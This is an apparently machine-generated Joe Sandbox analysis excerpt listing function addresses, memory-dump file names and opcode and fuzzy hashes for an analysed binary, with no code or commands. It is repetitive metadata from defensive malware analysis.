                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction ID: f4695fe204e48f0e43736708fc457c36315362a291bcf201df4f1ca99897dc8b
                                      • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction Fuzzy Hash: D1D16673F106254BEB08CA99DDD13ADB6E2EBD8350F1A423ED916F7381D6B89D018790
                                      Function 00180B88 Relevance: .4, Instructions: 378COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction ID: e59b9b348df2b25f6c416a9b592b947f8097dc297c42b7dced128f9548223944
                                      • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction Fuzzy Hash: 27D1F372E0061D8BDF659F98C8847EEB7B2BF49310F148229E925B7291D7345A4ACF50
                                      Function 0016B8A8 Relevance: .4, Instructions: 376COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction ID: 42c527173e132e26685fbf5e11dc58c0cfd9294239f1e2119a5f398fa65bd412
                                      • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction Fuzzy Hash: 2E028B74E046588FCF16CFA8C4905EDBBB6FF8D310F558159E889AB355C730AAA1CB50
                                      Function 0016BD68 Relevance: .4, Instructions: 372COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction ID: 29f0cb939cef3ac8cdbae2ea4f57da71a2f1e2d5e69fd3a14527f1af8dab6171
                                      • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction Fuzzy Hash: 53021475E00619CFCF15CF98C8809ADB7B6FF88350F258169E849AB355D731AAA1CF90
                                      Function 0018A648 Relevance: .3, Instructions: 339COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction ID: e429f86c2250d60096b3949f1f4d79f91b3415b5d4177f07b4a0ea2d469d8bad
                                      • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction Fuzzy Hash: 94C15A76E29B824BE713973DD802265F395AFE7290F55D72FFCE472942EB2096818304
                                      Function 00178BD9 Relevance: .3, Instructions: 302COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                      • Instruction ID: 8caff6952e3d0c1712b313128e4feb70bbf9f88bc77b5788409b414fd2cc7e14
                                      • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                      • Instruction Fuzzy Hash: 8FB12736D852999FDF26CBA4C4983FDBFB2AF56300F19C19AD4486B282DB344D85C790
                                      Function 0017AD38 Relevance: .3, Instructions: 302COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction ID: 61e0ef8126379f7dd6128d9b1b0c7f6b6611da0d2886a60af4972d0d0a5b5407
                                      • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction Fuzzy Hash: FDD15770604B40CFD725CF29C494B6BB7F0BB99300F54892ED89A8BB51DB35E945CB91
                                      Function 0016D720 Relevance: .3, Instructions: 295COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                      • Instruction ID: 329f575b575539dca1ffbc3b6003f5b82cc66d44bf822cbd5adaf8f04cb64a9d
                                      • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                      • Instruction Fuzzy Hash: B9D14AB460C3908FD7148F15D4A432BBFE0AF95708F19899EF4D90B391C3BA8959DB92
                                      Function 001545A8 Relevance: .3, Instructions: 291COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction ID: befbe10c413feadbcf0d715a7f4511d35d0decbd691f3ba2139970c2aa99030c
                                      • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction Fuzzy Hash: A7B1B272A083519BD308CF25C49135BF7E2EFC8314F1AC93EF8A99B290D774D9459A82
                                      Function 00141D78 Relevance: .3, Instructions: 291COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction ID: 5b48a213bf7003203a8bc1a93435db18e2dbb024d620a4f2e3d13adaa345c5fd
                                      • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction Fuzzy Hash: 04B19172A083115BD308CF25C89176BF7E2EFC8310F5AC93EF89997291D778D9459A82
                                      Function 00142138 Relevance: .3, Instructions: 284COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction ID: 0088e81a4c23e755295911292282168e90b41d72cdfd68dc88eb7c0c280ae4b3
                                      • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction Fuzzy Hash: D2B12771A097118FD706EE3DC491229F7E1AFE6280F51C72EF895B7662EB31E8818740
                                      Function 00181EE8 Relevance: .3, Instructions: 274COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
